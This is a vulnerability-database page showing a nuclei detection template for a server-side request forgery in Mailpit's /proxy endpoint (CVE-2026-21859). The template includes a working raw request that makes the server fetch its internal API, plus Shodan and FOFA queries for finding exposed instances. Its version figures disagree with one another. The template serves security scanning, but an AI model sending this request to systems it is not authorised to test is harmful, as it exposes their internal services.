Lucene search
K

Mailpit < 1.28.3 - Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 14 Views

Mailpit older than 1.28.3 has server-side forgery via unvalidated internal IPs in the proxy.

Related
Refs
Code
id: CVE-2026-21859

info:
  name: Mailpit < 1.28.3 - Server-Side Request Forgery
  author: omarkurt
  severity: high
  description: |
    Mailpit <= 1.28.0 contains a server-side request forgery caused by insufficient validation of internal IP addresses in the /proxy endpoint, letting attackers make requests to internal network resources, exploit requires crafted HTTP GET requests.
  impact: |
    Attackers can access internal network services and APIs, potentially exposing sensitive internal resources.
  remediation: |
    Update to version 1.28.1 or later.
  reference:
    - https://rosecurify.com/advisories/RO-26-001-mailpit-server-side-request-forgery-ssrf/
    - https://github.com/axllent/mailpit/security/advisories/GHSA-8v65-47jx-7mfr
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-21859
    epss-score: 0.00755
    epss-percentile: 0.50611
    cwe-id: CWE-918
    cpe: cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: axllent
    product: mailpit
    shodan-query: title:"Mailpit"
    fofa-query: title="Mailpit"
  tags: cve,cve2026,mailpit,axllent,oast,oob,ssrf,vkev

http:
  - raw:
      - |
        GET /proxy?url=http://127.0.0.1:8025/api/v1/info HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Version"'
          - '"Database"'
          - '"RuntimeStats"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204dadce0b45ad1f7ad83aefe563648b788e54c35786e8f863d2c4671c54293cb8022100b689673d3a0b903b0fa356022c57dac990e44c67a80950aa5e03898165a98bd6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.3 - 5.8
EPSS0.00755
SSVC
14